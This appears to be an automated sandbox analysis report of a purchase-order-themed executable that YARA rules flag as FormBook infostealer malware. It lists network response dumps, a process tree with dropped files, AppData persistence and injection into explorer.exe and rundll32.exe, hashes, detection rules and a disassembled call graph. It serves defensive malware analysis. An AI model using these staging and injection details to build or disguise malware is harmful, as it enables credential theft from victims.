70 72 69 76 61 63 79 2e 68 74 6d 6c 22 3e 20 50 72 69 76 61 63 79 20 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 64 69 73 63 6c 61 69 6d 65 72 2e 68 74 6d 6c 22 3e 20 44 69 73 63 6c 61 69 6d 65 72 20 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 67 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 67 65 2d 62 67 74 6f 70 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 20 54 6f 20 72 65 6d 6f 76 65 20 79 6f 75 72 73 65 6c 66 20 66 72 6f 6d 20 66 75 74 75 72 65 20 65 6d 61 69 6c 20 3c 2f 61 3e 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6e 74 72 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 65 6e 74 65 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 66 6f 72 6d 31 22 20 6e 61 6d 65 3d 22 66 6f 72 6d 31 22 20 6d 65 74 68 6f 64 3d 22 70
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="content-type" content="text/html; charset=utf-8" /><title>Publickit.website</title> <link href="images/default.css" rel="stylesheet" type="text/css" /></head><body><div id="wrapper"> <div id="header"> <div id="logo"> <h1><a href="#">Publickit.website</a></h1> </div> </div> <div id="menu"> <ul> <li class="active"><a href="index.html"> Home </a></li> <li><a href="privacy.html"> Privacy </a></li> <li><a href="disclaimer.html"> Disclaimer </a></li> </ul> </div> <div id="page"> <div id="page-bgtop"> <div id="content"> <div class="post"> <h2 class="title" align="center"><a href="#"> To remove yourself from future email </a></h2> <div class="entry"> <center> <form id="form1" name="form1" method="p
                                                                                                                        Nov 29, 2022 10:34:56.929332972 CET244INData Raw: 6f 73 74 22 20 61 63 74 69 6f 6e 3d 22 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6f 6e 63 6c 69 63 6b 3d 22 74 68 69 73 2e 76 61 6c 75 65 3d 27 27
                                                                                                                        Data Ascii: ost" action=""> <input type="text" onclick="this.value='' " name="email" value="" placeholder="Enter your e-mail here" style="padding:10px;" /> <br> <br> <br>


                                                                                                                        Statistics

                                                                                                                        CPU Usage

                                                                                                                        Click to jump to process

                                                                                                                        Memory Usage

                                                                                                                        Click to jump to process

                                                                                                                        High Level Behavior Distribution

                                                                                                                        Click to dive into process behavior distribution

                                                                                                                        Behavior

                                                                                                                        Click to jump to process

                                                                                                                        System Behavior

                                                                                                                        General

                                                                                                                        Target ID:0
                                                                                                                        Start time:10:33:03
                                                                                                                        Start date:29/11/2022
                                                                                                                        Path:C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:405670 bytes
                                                                                                                        MD5 hash:244FC9610F75225AA3DC09958195BEB1
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Target ID:1
                                                                                                                        Start time:10:33:03
                                                                                                                        Start date:29/11/2022
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\jaxdij.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k
                                                                                                                        Imagebase:0x240000
                                                                                                                        File size:147968 bytes
                                                                                                                        MD5 hash:2DD6C8B13AE7D028B0047435FF0DCB8A
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                        • Detection: 12%, ReversingLabs
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Target ID:2
                                                                                                                        Start time:10:33:04
                                                                                                                        Start date:29/11/2022
                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\jaxdij.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\Local\Temp\uqnwrddys.k
                                                                                                                        Imagebase:0x240000
                                                                                                                        File size:147968 bytes
                                                                                                                        MD5 hash:2DD6C8B13AE7D028B0047435FF0DCB8A
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.417309274.0000000001060000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.417458366.0000000001090000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.415905710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Target ID:3
                                                                                                                        Start time:10:33:10
                                                                                                                        Start date:29/11/2022
                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\Explorer.EXE
                                                                                                                        Imagebase:0x7ff69bc80000
                                                                                                                        File size:3933184 bytes
                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.383481318.000000001091F000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:4
                                                                                                                        Start time:10:33:15
                                                                                                                        Start date:29/11/2022
                                                                                                                        Path:C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe" "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L
                                                                                                                        Imagebase:0xb90000
                                                                                                                        File size:147968 bytes
                                                                                                                        MD5 hash:2DD6C8B13AE7D028B0047435FF0DCB8A
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Antivirus matches:
                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                        • Detection: 12%, ReversingLabs
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Target ID:7
                                                                                                                        Start time:10:33:19
                                                                                                                        Start date:29/11/2022
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 476
                                                                                                                        Imagebase:0xe70000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:8
                                                                                                                        Start time:10:33:24
                                                                                                                        Start date:29/11/2022
                                                                                                                        Path:C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\fqkyib\rubthqnwyfue.exe" "C:\Users\user\AppData\Local\Temp\jaxdij.exe" C:\Users\user\AppData\L
                                                                                                                        Imagebase:0xb90000
                                                                                                                        File size:147968 bytes
                                                                                                                        MD5 hash:2DD6C8B13AE7D028B0047435FF0DCB8A
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Target ID:10
                                                                                                                        Start time:10:33:26
                                                                                                                        Start date:29/11/2022
                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6040 -s 444
                                                                                                                        Imagebase:0xe70000
                                                                                                                        File size:434592 bytes
                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Target ID:11
                                                                                                                        Start time:10:33:54
                                                                                                                        Start date:29/11/2022
                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        Imagebase:0x380000
                                                                                                                        File size:61952 bytes
                                                                                                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                        Has elevated privileges:false
                                                                                                                        Has administrator privileges:false
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.821380016.0000000000500000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.822152428.0000000004480000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.821985368.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:high

                                                                                                                        Disassembly

                                                                                                                        Reset < >

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:15%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:22.9%
                                                                                                                          Total number of Nodes:1272
                                                                                                                          Total number of Limit Nodes:22
                                                                                                                          execution_graph 3533 401cc1 GetDlgItem GetClientRect 3534 402a0c 18 API calls 3533->3534 3535 401cf1 LoadImageA SendMessageA 3534->3535 3536 4028a1 3535->3536 3537 401d0f DeleteObject 3535->3537 3537->3536 3538 401dc1 3539 402a0c 18 API calls 3538->3539 3540 401dc7 3539->3540 3541 402a0c 18 API calls 3540->3541 3542 401dd0 3541->3542 3543 402a0c 18 API calls 3542->3543 3544 401dd9 3543->3544 3545 402a0c 18 API calls 3544->3545 3546 401de2 3545->3546 3547 401423 25 API calls 3546->3547 3548 401de9 ShellExecuteA 3547->3548 3549 401e16 3548->3549 3550 401645 3551 402a0c 18 API calls 3550->3551 3552 40164c 3551->3552 3553 402a0c 18 API calls 3552->3553 3554 401655 3553->3554 3555 402a0c 18 API calls 3554->3555 3556 40165e MoveFileA 3555->3556 3557 401671 3556->3557 3558 40166a 3556->3558 3559 405ff6 2 API calls 3557->3559 3562 40217f 3557->3562 3560 401423 25 API calls 3558->3560 3561 401680 3559->3561 3560->3562 3561->3562 3563 405a49 40 API calls 3561->3563 3563->3558 3564 401ec5 3565 402a0c 18 API calls 3564->3565 3566 401ecc 3565->3566 3567 406087 5 API calls 3566->3567 3568 401edb 3567->3568 3569 401ef3 GlobalAlloc 3568->3569 3570 401f5b 3568->3570 3569->3570 3571 401f07 3569->3571 3572 406087 5 API calls 3571->3572 3573 401f0e 3572->3573 3574 406087 5 API calls 3573->3574 3575 401f18 3574->3575 3575->3570 3579 405c59 wsprintfA 3575->3579 3577 401f4f 3580 405c59 wsprintfA 3577->3580 3579->3577 3580->3570 3581 4023c5 3592 402b16 3581->3592 3583 4023cf 3584 402a0c 18 API calls 3583->3584 3585 4023d8 3584->3585 3586 4023e2 RegQueryValueExA 3585->3586 3590 402672 3585->3590 3587 402402 3586->3587 3588 402408 RegCloseKey 3586->3588 3587->3588 3596 405c59 wsprintfA 3587->3596 3588->3590 3593 402a0c 18 API calls 3592->3593 3594 402b2f 3593->3594 3595 402b3d RegOpenKeyExA 3594->3595 3595->3583 3596->3588 3597 404746 3598 404772 3597->3598 3599 404756 3597->3599 3600 4047a5 3598->3600 3601 404778 SHGetPathFromIDListA 3598->3601 3608 4055a0 GetDlgItemTextA 3599->3608 3604 40478f SendMessageA 3601->3604 3605 404788 3601->3605 3603 404763 SendMessageA 3603->3598 3604->3600 3606 40140b 2 API calls 3605->3606 3606->3604 3608->3603 3612 4040cb lstrcpynA lstrlenA 3291 40324f SetErrorMode GetVersion 3292 403285 3291->3292 3293 40328b 3291->3293 3294 406087 5 API calls 3292->3294 3295 40601d 3 API calls 3293->3295 3294->3293 3296 4032a0 3295->3296 3297 40601d 3 API calls 3296->3297 3298 4032aa 3297->3298 3299 40601d 3 API calls 3298->3299 3300 4032b4 3299->3300 3301 406087 5 API calls 3300->3301 3302 4032bb 3301->3302 3303 406087 5 API calls 3302->3303 3304 4032c2 #17 OleInitialize SHGetFileInfoA 3303->3304 3384 405cfb lstrcpynA 3304->3384 3306 4032ff GetCommandLineA 3385 405cfb lstrcpynA 3306->3385 3308 403311 GetModuleHandleA 3309 403328 3308->3309 3310 405819 CharNextA 3309->3310 3311 40333c CharNextA 3310->3311 3319 403349 3311->3319 3312 4033b2 3313 4033c5 GetTempPathA 3312->3313 3386 40321e 3313->3386 3315 4033db 3316 4033ff DeleteFileA 3315->3316 3317 4033df GetWindowsDirectoryA lstrcatA 3315->3317 3396 402c88 GetTickCount GetModuleFileNameA 3316->3396 3320 40321e 12 API calls 3317->3320 3318 405819 CharNextA 3318->3319 3319->3312 3319->3318 3323 4033b4 3319->3323 3322 4033fb 3320->3322 3322->3316 3326 40347d ExitProcess OleUninitialize 3322->3326 3483 405cfb lstrcpynA 3323->3483 3324 403410 3324->3326 3332 405819 CharNextA 3324->3332 3365 403469 3324->3365 3327 4035a1 3326->3327 3328 403492 3326->3328 3330 403644 ExitProcess 3327->3330 3336 406087 5 API calls 3327->3336 3329 4055bc MessageBoxIndirectA 3328->3329 3335 4034a0 ExitProcess 3329->3335 3334 403427 3332->3334 3340 403444 3334->3340 3341 4034a8 3334->3341 3338 4035b4 3336->3338 3339 406087 5 API calls 3338->3339 3342 4035bd 3339->3342 3344 4058cf 18 API calls 3340->3344 3486 405543 3341->3486 3345 406087 5 API calls 3342->3345 3347 40344f 3344->3347 3348 4035c6 3345->3348 3347->3326 3484 405cfb lstrcpynA 3347->3484 3351 4035e4 3348->3351 3359 4035d4 GetCurrentProcess 3348->3359 3349 4034c9 lstrcatA lstrcmpiA 3349->3326 3353 4034e5 3349->3353 3350 4034be lstrcatA 3350->3349 3352 406087 5 API calls 3351->3352 3355 40361b 3352->3355 3356 4034f1 3353->3356 3357 4034ea 3353->3357 3360 403630 ExitWindowsEx 3355->3360 3366 40363d 3355->3366 3494 405526 CreateDirectoryA 3356->3494 3489 4054a9 CreateDirectoryA 3357->3489 3358 40345e 3485 405cfb lstrcpynA 3358->3485 3359->3351 3360->3330 3360->3366 3426 40374e 3365->3426 3499 40140b 3366->3499 3367 4034f6 SetCurrentDirectoryA 3368 403510 3367->3368 3369 403505 3367->3369 3498 405cfb lstrcpynA 3368->3498 3497 405cfb lstrcpynA 3369->3497 3373 405d1d 18 API calls 3374 403540 DeleteFileA 3373->3374 3375 40354d CopyFileA 3374->3375 3381 40351e 3374->3381 3375->3381 3376 403595 3377 405a49 40 API calls 3376->3377 3379 40359c 3377->3379 3378 405a49 40 API calls 3378->3381 3379->3326 3380 405d1d 18 API calls 3380->3381 3381->3373 3381->3376 3381->3378 3381->3380 3382 40555b 2 API calls 3381->3382 3383 403581 CloseHandle 3381->3383 3382->3381 3383->3381 3384->3306 3385->3308 3387 405f5d 5 API calls 3386->3387 3389 40322a 3387->3389 3388 403234 3388->3315 3389->3388 3390 4057ee 3 API calls 3389->3390 3391 40323c 3390->3391 3392 405526 2 API calls 3391->3392 3393 403242 3392->3393 3394 405a01 2 API calls 3393->3394 3395 40324d 3394->3395 3395->3315 3502 4059d2 GetFileAttributesA CreateFileA 3396->3502 3398 402ccb 3425 402cd8 3398->3425 3503 405cfb lstrcpynA 3398->3503 3400 402cee 3401 405835 2 API calls 3400->3401 3402 402cf4 3401->3402 3504 405cfb lstrcpynA 3402->3504 3404 402cff GetFileSize 3405 402e00 3404->3405 3423 402d16 3404->3423 3406 402be9 33 API calls 3405->3406 3407 402e07 3406->3407 3410 402e43 GlobalAlloc 3407->3410 3407->3425 3506 403207 SetFilePointer 3407->3506 3408 4031d5 ReadFile 3408->3423 3409 402e9b 3412 402be9 33 API calls 3409->3412 3411 402e5a 3410->3411 3416 405a01 2 API calls 3411->3416 3412->3425 3414 402e24 3417 4031d5 ReadFile 3414->3417 3415 402be9 33 API calls 3415->3423 3418 402e6b CreateFileA 3416->3418 3419 402e2f 3417->3419 3420 402ea5 3418->3420 3418->3425 3419->3410 3419->3425 3505 403207 SetFilePointer 3420->3505 3422 402eb3 3424 402f2e 48 API calls 3422->3424 3423->3405 3423->3408 3423->3409 3423->3415 3423->3425 3424->3425 3425->3324 3427 406087 5 API calls 3426->3427 3428 403762 3427->3428 3429 403768 3428->3429 3430 40377a 3428->3430 3516 405c59 wsprintfA 3429->3516 3431 405be2 3 API calls 3430->3431 3432 40379b 3431->3432 3434 4037b9 lstrcatA 3432->3434 3436 405be2 3 API calls 3432->3436 3435 403778 3434->3435 3507 403a17 3435->3507 3436->3434 3439 4058cf 18 API calls 3440 4037eb 3439->3440 3441 403874 3440->3441 3443 405be2 3 API calls 3440->3443 3442 4058cf 18 API calls 3441->3442 3444 40387a 3442->3444 3445 403817 3443->3445 3446 40388a LoadImageA 3444->3446 3447 405d1d 18 API calls 3444->3447 3445->3441 3450 403833 lstrlenA 3445->3450 3453 405819 CharNextA 3445->3453 3448 4038b5 RegisterClassA 3446->3448 3449 40393e 3446->3449 3447->3446 3451 4038f1 SystemParametersInfoA CreateWindowExA 3448->3451 3481 403479 3448->3481 3452 40140b 2 API calls 3449->3452 3454 403841 lstrcmpiA 3450->3454 3455 403867 3450->3455 3451->3449 3456 403944 3452->3456 3457 403831 3453->3457 3454->3455 3458 403851 GetFileAttributesA 3454->3458 3459 4057ee 3 API calls 3455->3459 3461 403a17 19 API calls 3456->3461 3456->3481 3457->3450 3460 40385d 3458->3460 3462 40386d 3459->3462 3460->3455 3464 405835 2 API calls 3460->3464 3465 403955 3461->3465 3517 405cfb lstrcpynA 3462->3517 3464->3455 3466 403961 ShowWindow 3465->3466 3467 4039e4 3465->3467 3468 40601d 3 API calls 3466->3468 3518 4050b9 OleInitialize 3467->3518 3470 403979 3468->3470 3472 403987 GetClassInfoA 3470->3472 3475 40601d 3 API calls 3470->3475 3471 4039ea 3473 403a06 3471->3473 3474 4039ee 3471->3474 3477 4039b1 DialogBoxParamA 3472->3477 3478 40399b GetClassInfoA RegisterClassA 3472->3478 3476 40140b 2 API calls 3473->3476 3479 40140b 2 API calls 3474->3479 3474->3481 3475->3472 3476->3481 3480 40140b 2 API calls 3477->3480 3478->3477 3479->3481 3482 4039d9 3480->3482 3481->3326 3482->3481 3483->3313 3484->3358 3485->3365 3487 406087 5 API calls 3486->3487 3488 4034ad lstrcatA 3487->3488 3488->3349 3488->3350 3490 4034ef 3489->3490 3491 4054fa GetLastError 3489->3491 3490->3367 3491->3490 3492 405509 SetFileSecurityA 3491->3492 3492->3490 3493 40551f GetLastError 3492->3493 3493->3490 3495 405536 3494->3495 3496 40553a GetLastError 3494->3496 3495->3367 3496->3495 3497->3368 3498->3381 3500 401389 2 API calls 3499->3500 3501 401420 3500->3501 3501->3330 3502->3398 3503->3400 3504->3404 3505->3422 3506->3414 3508 403a2b 3507->3508 3525 405c59 wsprintfA 3508->3525 3510 403a9c 3511 405d1d 18 API calls 3510->3511 3512 403aa8 SetWindowTextA 3511->3512 3513 403ac4 3512->3513 3514 4037c9 3512->3514 3513->3514 3515 405d1d 18 API calls 3513->3515 3514->3439 3515->3513 3516->3435 3517->3441 3526 404003 3518->3526 3520 4050dc 3524 405103 3520->3524 3529 401389 3520->3529 3521 404003 SendMessageA 3522 405115 OleUninitialize 3521->3522 3522->3471 3524->3521 3525->3510 3527 40401b 3526->3527 3528 40400c SendMessageA 3526->3528 3527->3520 3528->3527 3531 401390 3529->3531 3530 4013fe 3530->3520 3531->3530 3532 4013cb MulDiv SendMessageA 3531->3532 3532->3531 3613 402b51 3614 402b60 SetTimer 3613->3614 3615 402b79 3613->3615 3614->3615 3616 402bc7 3615->3616 3617 402bcd MulDiv 3615->3617 3618 402b87 wsprintfA SetWindowTextA SetDlgItemTextA 3617->3618 3618->3616 3627 402654 3628 402a0c 18 API calls 3627->3628 3629 40265b FindFirstFileA 3628->3629 3630 40267e 3629->3630 3633 40266e 3629->3633 3635 405c59 wsprintfA 3630->3635 3632 402685 3636 405cfb lstrcpynA 3632->3636 3635->3632 3636->3633 3637 4024d4 3638 4024d9 3637->3638 3639 4024ea 3637->3639 3646 4029ef 3638->3646 3640 402a0c 18 API calls 3639->3640 3642 4024f1 lstrlenA 3640->3642 3644 4024e0 3642->3644 3643 402672 3644->3643 3645 402510 WriteFile 3644->3645 3645->3643 3647 405d1d 18 API calls 3646->3647 3648 402a03 3647->3648 3648->3644 3649 4014d6 3650 4029ef 18 API calls 3649->3650 3651 4014dc Sleep 3650->3651 3653 4028a1 3651->3653 3659 4018d8 3660 40190f 3659->3660 3661 402a0c 18 API calls 3660->3661 3662 401914 3661->3662 3663 405620 70 API calls 3662->3663 3664 40191d 3663->3664 3665 4018db 3666 402a0c 18 API calls 3665->3666 3667 4018e2 3666->3667 3668 4055bc MessageBoxIndirectA 3667->3668 3669 4018eb 3668->3669 3166 40365c 3167 403677 3166->3167 3168 40366d CloseHandle 3166->3168 3169 403681 CloseHandle 3167->3169 3170 40368b 3167->3170 3168->3167 3169->3170 3175 4036b9 3170->3175 3176 4036c7 3175->3176 3177 403690 3176->3177 3178 4036cc FreeLibrary GlobalFree 3176->3178 3179 405620 3177->3179 3178->3177 3178->3178 3221 4058cf 3179->3221 3182 405654 3195 405789 3182->3195 3235 405cfb lstrcpynA 3182->3235 3183 40563d DeleteFileA 3184 40369c 3183->3184 3186 40567e 3187 405682 lstrcatA 3186->3187 3188 40568f 3186->3188 3190 405695 3187->3190 3236 405835 lstrlenA 3188->3236 3189 405ff6 2 API calls 3192 4057ae 3189->3192 3193 4056a3 lstrcatA 3190->3193 3194 4056ae lstrlenA FindFirstFileA 3190->3194 3192->3184 3196 4057ee 3 API calls 3192->3196 3193->3194 3194->3195 3200 4056d2 3194->3200 3195->3184 3195->3189 3198 4057b8 3196->3198 3197 405819 CharNextA 3197->3200 3199 4059b3 2 API calls 3198->3199 3201 4057be RemoveDirectoryA 3199->3201 3200->3197 3205 405768 FindNextFileA 3200->3205 3210 40572f 3200->3210 3216 405620 61 API calls 3200->3216 3240 405cfb lstrcpynA 3200->3240 3202 4057e0 3201->3202 3203 4057c9 3201->3203 3204 404fe7 25 API calls 3202->3204 3203->3184 3207 4057cf 3203->3207 3204->3184 3205->3200 3208 405780 FindClose 3205->3208 3209 404fe7 25 API calls 3207->3209 3208->3195 3211 4057d7 3209->3211 3213 4059b3 2 API calls 3210->3213 3212 405a49 40 API calls 3211->3212 3214 4057de 3212->3214 3215 405735 DeleteFileA 3213->3215 3214->3184 3220 405740 3215->3220 3216->3200 3217 404fe7 25 API calls 3217->3205 3218 404fe7 25 API calls 3218->3220 3220->3205 3220->3217 3220->3218 3241 405a49 3220->3241 3267 405cfb lstrcpynA 3221->3267 3223 4058e0 3224 405882 4 API calls 3223->3224 3225 4058e6 3224->3225 3226 405634 3225->3226 3227 405f5d 5 API calls 3225->3227 3226->3182 3226->3183 3233 4058f6 3227->3233 3228 405921 lstrlenA 3229 40592c 3228->3229 3228->3233 3230 4057ee 3 API calls 3229->3230 3232 405931 GetFileAttributesA 3230->3232 